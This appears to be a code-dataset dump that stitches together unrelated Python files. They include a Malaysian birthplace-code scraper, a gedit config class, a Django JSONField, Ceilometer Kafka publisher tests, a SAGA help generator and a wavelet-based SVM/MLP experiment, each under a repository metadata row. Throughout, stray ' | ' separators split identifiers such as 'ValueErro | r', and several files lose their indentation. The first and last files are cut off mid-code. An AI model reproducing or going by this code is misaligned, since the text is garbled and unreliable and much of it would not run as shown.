f = urllib.urlopen(state_list_url)
for state, bps in parse(f):
for bp in bps.split(','):
results[bp.strip()]['state'] = state
results[bp.strip()]['countries'].add('Malaysia')
# read the countries
#f = open('/tmp/countries.html', 'r')
f = urllib.urlopen(country_list_url)
for country, bp in parse(f):
results[bp]['countries'].add(country)
# print the results
print '# generated from National Registration Department of Malaysia, downloaded from'
print '# %s' % state_list_url
print '# %s' % country_list_url
print
for bp in sorted(results.iterkeys()):
res = bp
row = results[bp]
if 'state' in row:
res += ' state="%s"' % row['state']
countries = list(row['countries'])
countries.sort()
if len(countries) == 1:
res += ' country="%s"' % countries[0]
if len(countries) > 0:
res += ' countries="%s"' % (', '.join(countries))
print res
|
vbabiy/gedit-openfiles | gedit_openfiles/configuration.py | Python | gpl-2.0 | 1,698 | 0.002356 | from logger import log
import os
import gconf
import urllib
class Configuration(object):
def __init__(self):
self._config = {}
self._file_path = os.path.join(os.path.dirname(__file__), 'config',
'config.ini')
# Read Files
self._read_file()
def get_value(self, key):
if key in self._config:
log.debug("[Config] Getting Value for %s" % key)
value = self._config[key]
if value == "True":
return True
elif value == "False":
return False
return value
else:
return None |
def set_value(self, key, value):
self._config[key] = value
self._write_file()
def _write_file(self):
f = file(self._file_path, "wb")
config_list = [("%s=%s\n" % (key, value)) for key,
value in self._config.iteritems()]
f.writelines(config_list)
f.close()
def _read_file(self):
f = file(self._fi | le_path, "rb")
file_list = f.readlines()
f.close()
self._config = {} # reset config
for line in file_list:
line = line.strip()
if len(line) > 0:
name, value = line.split("=")
value = value.strip()
value = value.replace("[", "")
value = value.replace("]", "")
value = value.replace("'", "")
if value.find(",") > -1:
self.set_value(name, [v.strip() for v in value.split(',')])
else:
self.set_value(name, value)
log.info("[Config] Config Map = %s", self._config)
|
jrutila/django-reportengine | reportengine/jsonfield.py | Python | bsd-3-clause | 5,953 | 0.003192 | """
Django JSON Field. This extends Django Model Fields to store JSON as a field-type.
"""
#TODO - Move this to utils or another application. This is tangential to reporting and useful for other things.
from django.db import models
try:
import json as simplejson
except ImportError:
from django.utils import simplejson
from django.core.serializers.json import DjangoJSONEncoder
import logging
class JSONFieldDescriptor(object):
def __init__(self, field, datatype=dict):
"""
Create a JSONFieldDescriptor
:param field: The field to create the descriptor for.
:param datatype: The datatype of the descriptor.
"""
self.field = field
self.datatype = datatype
def __get__(self, instance=None, owner=None):
if instance is None:
raise AttributeError(
"The '%s' attribute can only be accessed from %s instances."
% (self.field.name, owner.__name__))
if not hasattr(instance, self.field.get_cache_name()):
data = instance.__dict__.get(self.field.attname, self.datatype())
if not isinstance(data, self.datatype):
data = self.field.loads(data)
if data is None:
data = self.datatype()
setattr(instance, self.field.get_cache_name(), data)
return getattr(instance, self.field.get_cache_name())
def __set__(self, instance, value):
if not isinstance(value, (self.datatype, basestring)):
value = self.datatype(value)
instance.__dict__[self.field.attname] = value
try:
delattr(instance, self.field.get_cache_name())
except AttributeError:
pass
class JSONField(models.TextField):
"""
A field for storing JSON-encoded data. The data is accessible as standard
Python data types and is transparently encoded/decoded to/from a JSON
string in the database.
"""
serialize_to_string = True
descriptor_class = JSONFieldDescriptor
def __init__(self, verbose_name=None, name=None,
encoder=DjangoJSONEncoder(), decoder=simplejson.JSONDecoder(),
datatype=dict,
**kwargs):
"""
Create a new JSONField
:param verbose_name: The verbose name of the field
:param name: The short name of the field.
:param encoder: The encoder used to turn native datatypes into JSON.
:param decoder: The decoder used to turn JSON into native datatypes.
:param datatype: The native datatype to store.
:param kwargs: Other arguments to pass to parent constructor.
"""
blank = kwargs.pop('blank', True)
models.TextField.__init__(self, verbose_name, name, blank=blank,
**kwargs)
self.encoder = encoder
self.decoder = decoder
self.datatype = datatype
#TODO - Is this used anywhere? If not, let's remove it.
def db_type(self, connection=None):
"""
Returns the database type. Overrides django.db.models.Field's db_type.
:param connection: The database connection - defaults to none.
:return: The database type. Always returns the string 'text'.
"""
return "text"
def contribute_to_class(self, cls, name):
"""
Overrides django.db.models.Field's contribute to class to handle descriptors.
:param cls: The class to contribute to.
:param name: The name.
"""
super(JSONField, self).contribute_to_class(cls, name)
setattr(cls, self.name, self.descriptor_class(self, self.datatype))
def pre_save(self, model_instance, add):
"Returns field's value just before saving. If a descriptor, get's that instead of value from object."
descriptor = getattr(model_instance, self.attname)
if isinstance(descriptor, self.datatype):
return descriptor
return self.field.value_from_object(model_instance)
def get_db_prep_save(self, value, *args, **kwargs):
if not isinstance(value, basestring):
value = self.dumps(value)
return super(JSONField, self).get_db_prep_save(value, *args, **kwargs)
def value_to_string(self, obj):
"""
Turns the value to a JSON string.
:param obj: An object.
:return: A string.
"""
return self.dumps(self.value_from_object(obj))
def dumps(self, data):
"""
Encodes data and dumps.
:param data: A value.
:return: An encoded string.
"""
return self.encoder.encode(data)
def loads(self, val):
"""
:param val: A JSON encoddd string.
:return: A dict with data from val
"""
try:
val = self.decoder.decode(val)#, encoding=settings.DEFAULT_CHARSET)
# XXX We need to investigate why this is happening once we have
# a solid repro case.
if isinstance(val, basestring):
logging.warning("JSONField decode error. Expected dictionary, "
"got string for input '%s'" % val)
# For whatever reason, we may have gotten back
val = self.decoder.decode(val)#, encoding=settings.DEFAULT_CHARSET)
except ValueErro | r:
val = None
return val
def south_field_triple(self):
"""
Returns a suitable description of this field for South."
:r | eturn: A tuple of field_class, args and kwargs from South's introspector.
"""
# We'll just introspect the _actual_ field.
from south.modelsinspector import introspector
field_class = "django.db.models.fields.TextField"
args, kwargs = introspector(self)
# That's our definition!
return (field_class, args, kwargs)
|
erdc-cm/air-water-vv | 2d/hydraulicStructures/sharp_crested_weir/deprecated/sharp_crested_weir_AV_V1/ls_n.py | Python | mit | 1,536 | 0.017578 | from proteus import *
from ls_p import *
if timeDiscretization=='vbdf':
timeIntegration = VBDF
timeOrder=2
stepController = Min_dt_cfl_controller
elif timeDiscretization=='flcbdf':
timeIntegration = FLCBDF
#stepController = FLCBDF_controller
stepController = Min_dt_cfl_controller
time_tol = 10.0*ls_nl_atol_res
atol_u = {0:time_tol}
rtol_u = {0:time_tol}
else:
timeIntegration = BackwardEuler_cfl
stepController = Min_dt_cfl_controller
femSpaces = {0:basis}
massLumping = False
conservativeFlux = None
numericalFluxType = NCLS.NumericalFlux
subgridError = NCLS.SubgridError(coefficients,nd)
shockCapturing = NCLS.ShockCapturing(coefficients,nd,shockCapturingFactor=ls_shockCapturingFactor,lag=ls_lag_shockCapturing)
fullNewtonFlag = True
multilevelNonlinearSolver = Newton
levelNonlinearSolver = Newton
nonlinearSmoother = None
linearSmo | other = None
matrix = SparseMatrix
if useOldPETSc:
multilevelLinearSolver = PETSc
levelLinearSolver = PETSc
else:
| multilevelLinearSolver = KSP_petsc4py
levelLinearSolver = KSP_petsc4py
if useSuperlu:
multilevelLinearSolver = LU
levelLinearSolver = LU
linear_solver_options_prefix = 'ncls_'
nonlinearSolverConvergenceTest = 'r'
levelNonlinearSolverConvergenceTest = 'r'
linearSolverConvergenceTest = 'r-true'
tolFac = 0.0
nl_atol_res = ls_nl_atol_res
linTolFac = 0.1
l_atol_res = 0.1*ls_nl_atol_res
useEisenstatWalker = False
maxNonlinearIts = 50
maxLineSearches = 0
|
kiith-sa/QGIS | python/plugins/processing/saga/SagaHelpGenerator.py | Python | gpl-2.0 | 7,582 | 0.000528 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
***************************************************************************
SagaHelpGenerator.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
import saga_api as saga
class Library:
def __init__(self, filename):
self.sagalib = saga.CSG_Module_Library(saga.CSG_String(str(filename)))
if not self.sagalib.is_Valid():
raise ImportError(filename)
self.libname = filename.split(os.sep)[-1].split(".")[0]
if self.libname.startswith("lib"):
self.libname = self.libname[3:]
self.name = self.sagalib.Get_Name().c_str()
self._modules = None
def modules(self):
if self._modules is not None:
return self._modules
self._modules = list()
for i in range(self.sagalib.Get_Count()):
try:
self._modules.append(Module(self.sagalib, i))
except ImportError:
pass
return self._modules
def __del__(self):
self.sagalib.Destroy()
class Module:
def __init__(self, lib, i):
self.module = lib.Get_Module(i)
if not self.module:
raise ImportError("Module #%i is invalid" % i)
if self.module.is_Interactive():
raise ImportError("Ignoring interactive module")
self.name = self.module.Get_Name()
self.grid = self.module.is_Grid()
if self.module.is_Grid():
self.module = lib.Get_Module_Grid(i)
self.description = self.module.Get_Description()
self.author = self.module.Get_Author()
self._parameters = None
def parameters(self):
if self._parameters is not None:
return self._parameters
params = list()
params.append(self.module.Get_Parameters())
for i in range(self.module.Get_Parameters_Count()):
params.append(self.module.Get_Parameters(i))
self._parameters = list()
for p in params:
for j in range(p.Get_Count()):
try:
self._parameters.append(Parameter(p, j))
except:
pass
return self._parameters
class Parameter:
def __init__(self, params, i):
self.parameter = params.Get_Parameter(i)
self.name = self.parameter.Get_Name()
self.description = self.parameter.Get_Description()
self.typeName = self.parameter.Get_Type_Name()
if self.parameter.is_Output():
self.typeName = "Output " + self.typeName
if self.parameter.is_Input():
self.typeName = "Input " + self.typeName
typ = self.parameter.Get_Type()
self.minimum = None
self.maximum = None
if (typ == saga.PARAMETER_TYPE_Int) or \
(typ == saga.PARAMETER_TYPE_Double) or \
(typ == saga.PARAMETER_TYPE_Degree) or \
(typ == saga.PARAMETER_TYPE_Range):
parameterValue = self.parameter.asValue()
if parameterValue.has_Minimum():
self.minimum = parameterValue.Get_Minimum()
if parameterValue.has_Maximum():
self.maximum = parameterValue.Get_Maximum()
self.choices = None
if typ == saga.PARAMETER_TYPE_Choice:
parameterChoice = self.parameter.asChoice()
self.choices = [parameterCh | oice.Get_Item(i) for i in
range(parameterChoice.Get_Count())]
def getLibraryPaths(userPath=None):
try:
paths = os.environ['MLB_PATH'].split(':')
ex | cept KeyError:
paths = ['/usr/lib/saga/', '/usr/local/lib/saga/']
noMLBpath = True
if userPath:
paths = [userPath] + paths
print "Looking for libraries in " + ', '.join(paths)
for p in paths:
if os.path.exists(p):
return [os.path.join(p, fn) for fn in os.listdir(p)]
if noMLBpath:
print "Warning: MLB_PATH not set."
return []
def qgisizeString(s):
try:
s = str(s)
s = str.replace(s, "Gridd", "Raster")
s = str.replace(s, "Grid", "Raster")
s = str.replace(s, "gridd", "raster")
s = str.replace(s, "grid", "raster")
except:
# Some unicode characters seem to produce exceptions.
# Just ignore those cases.
pass
return s
def writeHTML(path, mod):
docs = unicode()
docs += "<h1 class='module'>%s</h1>\n" % mod.name
docs += "<div class='author'>%s</div>\n" % mod.author
docs += "<div class='description'>%s</div>\n" \
% mod.description.replace('\n', '<br/>\n')
if mod.parameters():
docs += "<h2>Parameters</h2>\n<dl class='parameters'>\n"
for p in mod.parameters():
constraints = list()
if p.minimum:
constraints.append("Minimum: " + str(p.minimum))
if p.maximum:
constraints.append("Maximum: " + str(p.maximum))
if p.choices:
constraints.append("Available choices: "
+ ', '.join(p.choices))
docs += "\t<dt>%s <div class='type'>%s</div></dt>" \
% (p.name, p.typeName)
docs += "<dd>%s <div class='constraints'>%s</div></dd>\n" \
% (p.description, '; '.join(constraints))
docs += "</dl>"
out = open(path, 'w')
out.write('<html>\n<head><link rel="stylesheet" type="text/css" \
href="help.css" /></head>\n<body>\n')
out.write(docs.encode('utf-8'))
out.write('\n</body></html>\n')
out.close()
if __name__ == '__main__':
    # Script entry point: generate one HTML help page per SAGA module.
    import argparse
    parser = argparse.ArgumentParser(
        description='Generate SAGA documentation in HTML form.')
    parser.add_argument('dest', metavar='DESTINATION', type=str,
                        help='HTML output path.')
    parser.add_argument('-l', dest='libpath',
                        help='Location of SAGA libraries.')
    args = parser.parse_args()
    libs = list()
    paths = getLibraryPaths(args.libpath)
    # Load every SAGA library that can be imported; skip the rest.
    for p in paths:
        try:
            libs.append(Library(p))
        except ImportError:
            pass
    if not libs:
        print "No saga libraries found"
        exit(1)
    print "%i libraries loaded." % len(libs)
    for lib in libs:
        mods = lib.modules()
        print "%s (%i modules):" % (lib.name, len(mods))
        for mod in mods:
            # Output file name: the module name without spaces/slashes.
            path = args.dest + os.sep \
                + mod.name.replace(" ", '').replace("/", '') + ".html"
            print '\t', mod.name,
            writeHTML(path, mod)
            print '\t-> ', path
|
cernops/ceilometer | ceilometer/tests/unit/publisher/test_kafka_broker_publisher.py | Python | apache-2.0 | 8,865 | 0 | #
# Copyright 2015 Cisco Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for ceilometer/publisher/kafka_broker.py
"""
import datetime
import uuid
import mock
from oslo_utils import netutils
from ceilometer.event.storage import models as event
from ceilometer.publisher import kafka_broker as kafka
from ceilometer.publisher import messaging as msg_publisher
from ceilometer import sample
from ceilometer.tests import base as tests_base
@mock.patch('ceilometer.publisher.kafka_broker.LOG', mock.Mock())
@mock.patch('ceilometer.publisher.kafka_broker.kafka.KafkaClient',
mock.Mock())
class TestKafkaPublisher(tests_base.BaseTestCase):
test_event_data = [
event.Event(message_id=uuid.uuid4(),
event_type='event_%d' % i,
generated=datetime.datetime.utcnow(),
traits=[], raw={})
for i in range(0, 5)
]
test_data = [
sample.Sample(
name='test',
type=sample.TYPE_CUMULATIVE,
unit='',
volume=1,
user_id='test',
project_id='test',
resource_id='test_run_tasks',
timestamp=datetime.datetime.utcnow().isoformat(),
resource_metadata={'name': 'TestPublish'},
),
sample.Sample(
name='test',
type=sample.TYPE_CUMULATIVE,
unit='',
volume=1,
user_id='test',
project_id='test',
resource_id='test_run_tasks',
timestamp=datetime.datetime.utcnow().isoformat(),
resource_metadata={'name': 'TestPublish'},
),
sample.Sample(
name='test2',
type=sample.TYPE_CUMULATIVE,
unit='',
volume=1,
user_id='test',
project_id='test',
resource_id='test_run_tasks',
timestamp=datetime.datetime.utcnow().isoformat(),
resource_metadata={'name': 'TestPublish'},
),
sample.Sample(
name='test2',
type=sample.TYPE_CUMULATIVE,
unit='',
volume=1,
user_id='test',
project_id='test',
resource_id='test_run_tasks',
timestamp=datetime.datetime.utcnow().isoformat(),
resource_metadata={'name': 'TestPublish'},
),
sample.Sample(
name='test3',
type=sample.TYPE_CUMULATIVE,
unit='',
volume=1,
user_id='test',
project_id='test',
resource_id='test_run_tasks',
timestamp=datetime.datetime.utcnow().isoformat(),
resource_metadata={'name': 'TestPublish'},
),
]
def test_publish(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer'))
with mock.patch.object(publisher, '_producer') as fake_producer:
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(5, len(fake_producer.send_messages.mock_calls))
self.assertEqual(0, len(publisher.local_queue))
def test_publish_without_options(self):
publisher = kafka.KafkaBrokerPublisher(
netutils.urlsplit('kafka://127.0.0.1:9092'))
with mock.patch.object(publisher, '_producer') as fake_producer:
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(5, len(fake_producer.send_messages.mock_calls))
self.assertEqual(0, len(publisher.local_queue))
def test_publish_to_host_without_policy(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer'))
self.assertEqual('default', publisher.policy)
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer&policy=test'))
self.assertEqual('default', publisher.policy)
def test_publish_to_host_with_default_policy(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer&policy=default'))
with mock.patch.object(publisher, '_producer') as fake_producer:
fake_producer.send_messages.side_effect = TypeError
self.assertRaises(msg_publisher.DeliveryFailure,
publisher.publish_samples,
mock.MagicMock(), self.test_data)
self.assertEqual(100, len(fake_producer.send_messages.mock_calls))
self.assertEqual(0, len(publisher.local_queue))
def test_publish_to_host_with_drop_policy(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer&policy=drop'))
w | ith mock.patch.object(publisher, '_producer') as fake_producer:
fake_producer.send_messages.side_effec | t = Exception("test")
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(1, len(fake_producer.send_messages.mock_calls))
self.assertEqual(0, len(publisher.local_queue))
def test_publish_to_host_with_queue_policy(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer&policy=queue'))
with mock.patch.object(publisher, '_producer') as fake_producer:
fake_producer.send_messages.side_effect = Exception("test")
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(1, len(fake_producer.send_messages.mock_calls))
self.assertEqual(1, len(publisher.local_queue))
    def test_publish_to_down_host_with_default_queue_size(self):
        """Queue policy: local queue caps at 1024 batches, oldest evicted.

        2000 batches are published against a permanently failing
        producer; only the newest 1024 (test-976 .. test-1999) may
        remain in the local queue.
        """
        publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
            'kafka://127.0.0.1:9092?topic=ceilometer&policy=queue'))
        with mock.patch.object(publisher, '_producer') as fake_producer:
            # Every send fails, so each batch lands in the local queue.
            fake_producer.send_messages.side_effect = Exception("test")
            for i in range(0, 2000):
                for s in self.test_data:
                    s.name = 'test-%d' % i
                publisher.publish_samples(mock.MagicMock(), self.test_data)
            # 2000 - 1024 = 976 oldest batches were evicted.
            self.assertEqual(1024, len(publisher.local_queue))
            self.assertEqual('test-976',
                             publisher.local_queue[0][2][0]['counter_name'])
            self.assertEqual('test-1999',
                             publisher.local_queue[1023][2][0]['counter_name'])
    def test_publish_to_host_from_down_to_up_with_queue(self):
        """Queue policy: queued batches are flushed once the broker recovers."""
        publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
            'kafka://127.0.0.1:9092?topic=ceilometer&policy=queue'))
        with mock.patch.object(publisher, '_producer') as fake_producer:
            # Broker down: 16 batches accumulate in the local queue.
            fake_producer.send_messages.side_effect = Exception("test")
            for i in range(0, 16):
                for s in self.test_data:
                    s.name = 'test-%d' % i
                publisher.publish_samples(mock.MagicMock(), self.test_data)
            self.assertEqual(16, len(publisher.local_queue))
            # Broker back up: the next publish must drain the whole queue.
            fake_producer.send_messages.side_effect = None
            for s in self.test_data:
                s.name = 'test-%d' % 16
            publisher.publish_samples(mock.MagicMock(), self.test_data)
            self.assertEqual(0, len(publisher.local_queue))
def test_publish_event_with_default_policy(self):
publisher = kafka.KafkaBrokerPublisher(
netutils.urlsplit('kafka://127.0.0.1:9092?topic=ceilometer'))
with m |
fberanizo/sin5016 | tests/test_db2.py | Python | bsd-2-clause | 7,829 | 0.007207 | # -*- coding: utf-8 -*-
from context import svm, mlp
import unittest, numpy
from os import listdir
from os.path import isfile, join
from scipy.io import loadmat
from sklearn.decomposition import PCA
from sklearn.externals import joblib
from sklearn.model_selection import train_test_split, GridSearchCV, cross_val_score, StratifiedKFold
from sklearn.metrics import accuracy_score, classification_report
class DB2TestSuite(unittest.TestCase):
    """Test suite for the SDUMLA-HTM data set using the db2 Daubechies wavelet.

    Trains SVM (linear and RBF kernels) and MLP classifiers on 10 data
    subsets and compares them with a Friedman test on their accuracy
    ranks.  (Python 2 code: note the use of map() as a list at the rank
    computation below.)
    """
    def __init__(self, *args, **kwargs):
        # NOTE(review): heavy dataset loading happens per instantiation;
        # unittest creates one instance per test method.
        super(DB2TestSuite, self).__init__(*args, **kwargs)
        X, y = self.read_dataset()
        self.n_datasets = 10
        self.X_train, self.X_test, self.y_train, self.y_test = [None]*self.n_datasets, [None]*self.n_datasets, [None]*self.n_datasets, [None]*self.n_datasets
        self.X_train_PCA, self.X_test_PCA = [None]*self.n_datasets, [None]*self.n_datasets
        # Split the data set into 10 subsets of ~840 samples (10 classes each).
        print("Dividindo conjunto de dados em 10 subconjuntos...")
        for i in range(self.n_datasets):
            begin = i * 840
            end = begin + 840
            # 25% of each subset is held out for testing.
            self.X_train[i], self.X_test[i], self.y_train[i], self.y_test[i] = train_test_split(X[begin:end,:], y[begin:end], test_size=0.25)
            # Apply PCA to reduce dimensionality until the retained
            # variance exceeds 0.9.  Only used for the MLP.
            pca = PCA(n_components=0.9)
            self.X_train_PCA[i] = pca.fit_transform(self.X_train[i])
            self.X_test_PCA[i] = pca.transform(self.X_test[i])
    def test_db2(self):
        """Trains and tests all models, then runs a Friedman rank test."""
        k, clf1, clf2, clf3 = 3, [], [], []
        # Train the three classifiers on each of the 10 data subsets.
        for i in range(self.n_datasets):
            print("Treinando conjunto de dados %d de %d" % (i+1, self.n_datasets))
            clf1.append(self.train_svm_linear(self.X_train[i], self.y_train[i]))
            clf2.append(self.train_svm_rbf(self.X_train[i], self.y_train[i]))
            clf3.append(self.train_mlp(self.X_train_PCA[i], self.y_train[i]))
            joblib.dump(clf1[i], 'trained-estimators/db2-3-LL/svm-linear-'+str(i+1)+'.pkl')
            joblib.dump(clf2[i], 'trained-estimators/db2-3-LL/svm-rbf-'+str(i+1)+'.pkl')
            joblib.dump(clf3[i], 'trained-estimators/db2-3-LL/mlp-'+str(i+1)+'.pkl')
            #y_pred = classifier.predict(X_test)
            #print(classification_report(y_test, y_pred))
        # Friedman test
        #clf1.append(joblib.load('trained-estimators/db2-3-LL/svm-linear-0.pkl'))
        #clf2.append(joblib.load('trained-estimators/db2-3-LL/svm-rbf-0.pkl'))
        #clf3.append(joblib.load('trained-estimators/db2-3-LL/mlp0.pkl'))
        rank = []
        for i in range(self.n_datasets):
            # Rank the three models by test accuracy on this subset.
            rank.append(sorted([(1, clf1[i].score(self.X_test[i], self.y_test[i])), \
                                (2, clf2[i].score(self.X_test[i], self.y_test[i])), \
                                (3, clf3[i].score(self.X_test_PCA[i], self.y_test[i]))], key=lambda t: t[1], reverse=True))
        # Keep only the model ids in rank order (Python 2: map returns a list).
        rank = numpy.array(map(lambda r: [r[0][0], r[1][0], r[2][0]], rank))
        # Mean rank per model.
        rj = numpy.mean(rank, axis=0)
        print("Rank médio para SVM Linear, SVM RBF e MLP: %s" % rj)
        rmean = rank.mean()
        sst = self.n_datasets * ((rj -rmean)**2).sum()
        sse = 1.0/(self.n_datasets*(k-1)) * ((rank-rmean)**2).sum()
        # Friedman chi-square statistic.
        chi_square = sst/sse
        print("chi_square = %f" % chi_square)
        # for k=3 and N=5, p-value < 0.05, chi^2 > 6.4
        assert True
    def read_dataset(self):
        """Reads the pre-processed wavelet data set from *.mat files.

        (The original docstring claimed a 5-way split; no splitting
        happens here -- it returns the full X, y arrays.)
        """
        # The user must define three parameters, namely:
        # decomposition level (1, 2 or 3)
        # mother wavelet function (db2, db4, sym3, sym4, sym5)
        # which sub-band(s) to use (LL, HL, LH, HH)
        path = join('/', 'home', 'fabio', 'imagens_clodoaldo', 'Wavelet')#input('Diretório com o conjunto de dados pré-processado (com os arquivos *.mat): ')
        level = '3'#raw_input('Nível de decomposição (1, 2 ou 3): ')
        wavelet = 'db2'#raw_input('Função wavelet mãe (db2, db4, sym3, sym4, sym5): ')
        band = 'LL'#raw_input('Qual sub-banda) utilizar (LL, HL, LH, HH): ')
        band_dict = {'LL':0, 'HL':1, 'LH':2, 'HH':3}
        # Read the directory containing the data set.
        path = join(path, wavelet)
        files = [f for f in listdir(path) if isfile(join(path, f))]
        # Sort files by the numeric class id embedded in the file name.
        files = sorted(files, key=lambda file: int(file.split('.')[0][1:]))
        X, y = [], []
        print("Lendo arquivos *.mat...")
        for file in files:
            try:
                #print('Lendo arquivo %s'% file)
                dataset = loadmat(join(path, file))
            except Exception:
                continue
            finally:
                # dataset['coef'][0][0][SUB-BANDA][0,LEVEL], SUB-BANDAS = [0..3] (LL, LH, HL, HH)
                data = numpy.ravel(dataset['coef'][0][0][band_dict[band]][0,int(level)-1])
                X.append(data)
                y.append(int(file.split('.')[0][1:]))
        X, y = numpy.array(X), numpy.array(y)
        return X, y
    def train_svm_linear(self, X, y):
        """Trains a linear SVM and returns the fitted GridSearchCV wrapper."""
        clf = svm.SVM(kernel='linear')
        grid = {'C': [1]}
        # Parameter grid search with 5x2-fold cross-validation.
        skf_inner = StratifiedKFold(n_splits=2)
        skf_outer = StratifiedKFold(n_splits=5)
        # Optimize parameters (2-fold inner loop).
        clf = GridSearchCV(estimator=clf, param_grid=grid, cv=skf_inner, verbose=0, n_jobs=2)
        clf.fit(X, y)
        # Validate with the optimal training parameters (5-fold outer loop).
        validation_score = cross_val_score(clf, X=X, y=y, cv=skf_outer, verbose=0, n_jobs=1)
        print("SVM Linear - Acurácia de validação = %f" % validation_score.mean())
        return clf
    def train_svm_rbf(self, X, y):
        """Trains an RBF-kernel SVM and returns the fitted GridSearchCV wrapper."""
        clf = svm.SVM(kernel='rbf')
        grid = {'C': [1], 'gamma': [0]}
        # Parameter grid search with 5x2-fold cross-validation.
        skf_inner = StratifiedKFold(n_splits=2)
        skf_outer = StratifiedKFold(n_splits=5)
        # Optimize parameters (2-fold inner loop).
        clf = GridSearchCV(estimator=clf, param_grid=grid, cv=skf_inner, verbose=0, n_jobs=2)
        clf.fit(X, y)
        # Validate with the optimal training parameters (5-fold outer loop).
        validation_score = cross_val_score(clf, X=X, y=y, cv=skf_outer, verbose=0, n_jobs=1)
        print("SVM RBF - Acurácia de validação = %f" % validation_score.mean())
        return clf
    def train_mlp(self, X, y):
        """Trains an MLP and returns the fitted GridSearchCV wrapper."""
        clf = mlp.MLP()
        grid = {'hidden_layer_size': [15]}
        # Parameter grid search with 5x2-fold cross-validation.
        skf_inner = StratifiedKFold(n_splits=2)
        skf_outer = StratifiedKFold(n_splits=5)
        # Optimize parameters (2-fold inner loop).
        clf = GridSearchCV(estimator=clf, param_grid=grid, cv=skf_inner, verbose=0, n_jobs=2)
        clf.fit(X, y)
        # Validate with the optimal training parameters (5-fold outer loop).
        validation_score = cross_val_score(clf, X=X, y=y, cv=skf_outer, verbose=0, n_jobs=1)
        print("MLP - Acurácia de validação = %f" % validation_score.mean())
        return clf
if __name__ == '__main__':
    # Run the suite when executed as a script.
    unittest.main()
|
DLR-SC/DataFinder | src/datafinder/core/configuration/properties/validators/base_validators.py | Python | bsd-3-clause | 13,874 | 0.010379 | # $Filename$
# $Authors$
# Last Changed: $Date$ $Committer$ $Revision-Id$
#
# Copyright (c) 2003-2011, German Aerospace Center (DLR)
# All rights reserved.
#
#Redistribution and use in source and binary forms, with or without
#
#modification, are permitted provided that the following conditions are
#met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of the German Aerospace Center nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
#OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
#SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
#LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
#DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
#THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module defines a basic set of validation functions / classes for value verification.
"""
import decimal
import re
import sys
__version__ = "$Revision-Id:$"
class IsInRange(object):
    """
    Checks whether a given value is in a specific range.
    The requirement is that minimum, maximum and the value are comparable (<, > support).
    """
    def __init__(self, minValue=None, maxValue=None):
        """
        @param minValue: The lower bound, or C{None} for no lower bound.
        @type minValue: C{object}
        @param maxValue: The upper bound, or C{None} for no upper bound.
        @type maxValue: C{object}
        """
        self.minValue = minValue
        self.maxValue = maxValue
    def __call__(self, value):
        """
        Implements the validation.
        @param value: The value to check.
        @type value: C{object}
        @raise ValueError: If the value lies outside the configured bounds.
        """
        if self.minValue is not None and value < self.minValue:
            raise ValueError("The provided value is < than the defined minimum.")
        if self.maxValue is not None and value > self.maxValue:
            # Fixed wording of the error message ("then" -> "than").
            raise ValueError("The provided value is > than the defined maximum.")
class IsDecimalInRange(object):
    """ Validates that a numeric value lies within decimal bounds. """
    def __init__(self, minValue, maxValue):
        """
        @param minValue: The lower bound.
        @type minValue: C{decimal.Decimal}, C{int}, C{long}, C{float}
        @param maxValue: The upper bound.
        @type maxValue: C{decimal.Decimal}, C{int}, C{long}, C{float}
        """
        self.minValue = minValue
        self.maxValue = maxValue
        self.__rangeCheck = IsInRange()
    def __call__(self, value):
        """
        Validates the given value.
